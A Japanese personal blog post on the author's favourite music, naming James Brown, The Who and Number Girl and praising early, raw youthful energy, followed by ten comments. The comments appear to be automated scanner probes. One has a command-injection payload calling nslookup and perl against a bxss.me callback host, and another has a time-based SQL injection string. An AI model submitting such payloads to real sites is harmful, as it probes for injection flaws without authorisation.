好きな音楽ってなに?

と聞かれたら、なんて答えるか。それは映画でも作家でも漫画でも、「自分」が特に自分がでるなと思うものは、用心して答えることがこれまで多かった。聞かれた相手と、その時の気分も大いに作用した。どうでもいいジャンルだったら、即答だ。どうでもよくなくても大した拘りがないものも楽勝だ。例えば好きなドレッシングは?とか、好きなウルトラマンは?、好きな夜景は?などは、何の用心もなく、辛辣さも含んで即答だ。好きな音楽は?の答えが一番難しいまま、年を重ね、今では答えを持って暮らすようにしている。最近、音楽は何聞いている?という質問は、構えず答えられるが、好きな音楽イコール自分みたいな大げさな考えとなっている。聞いているヒトはそんなことはないだろうが、自身の音楽活動が減った今では、あまり聞かれない質問となっており、聞かれた時は自分に興味があるということになっている。そうだとしたら、、どんな音楽が好きなことが本心であり、思わぬメッセージをお届けすることにならないかを気にしている。なんて小さな話だ。。俺は、洋楽ならジェームスブラウンとザ・フー、邦楽ならナンバーガールが突出して好きだ。この三つがベスト3だ。特にナンバーガールは、なぜか最近めっきり好きになっていて、ライブやPVの映像を見る度に、ウットリしている。切なくなったり、笑ったり、憧れたり、メンバーになりたいと思ったり、カッコイイと思ったりしている。ナンバーガールは向井秀徳の初期であり、ジェームスブラウンも断然初期が好きだし、ザ・フーも全くそう。肉体は躍動し、知識の不足があり、衝動や怒り、作りたい欲が充満する、その若いエネルギーこそが、音楽のミラクルを引き出す、魔法の一つだと信じてやまない。ナンバーガールの1995年からの数年間で残した作品群はもっと評価されてもいいと思う。これが俺の好きな音楽です。

コメントをお書きください

コメント: 10
  • #1

    kXvrbKwH (金曜日, 08 10月 2021 11:54)

    1

  • #2

    kXvrbKwH (金曜日, 08 10月 2021 11:55)

    1

  • #3

    kXvrbKwH (金曜日, 08 10月 2021 11:55)

    1

  • #4

    |(nslookup hitygudxtgfru6bc18.bxss.me||perl -e "gethostbyname('hitygudxtgfru6bc18.bxss.me')") (金曜日, 08 10月 2021 11:55)

    1

  • #5

    kXvrbKwH (金曜日, 08 10月 2021)

    -1; waitfor delay '0:0:15' --

  • #6

    kXvrbKwH (金曜日, 08 10月 2021 11:56)

    1

  • #7

    kXvrbKwH (金曜日, 08 10月 2021 11:57)

    1

  • #8

    kXvrbKwH (金曜日, 08 10月 2021 11:57)

    1

  • #9

    kXvrbKwH (金曜日, 08 10月 2021 11:58)

    1

  • #10

    kXvrbKwH (金曜日, 08 10月 2021 13:05)

    1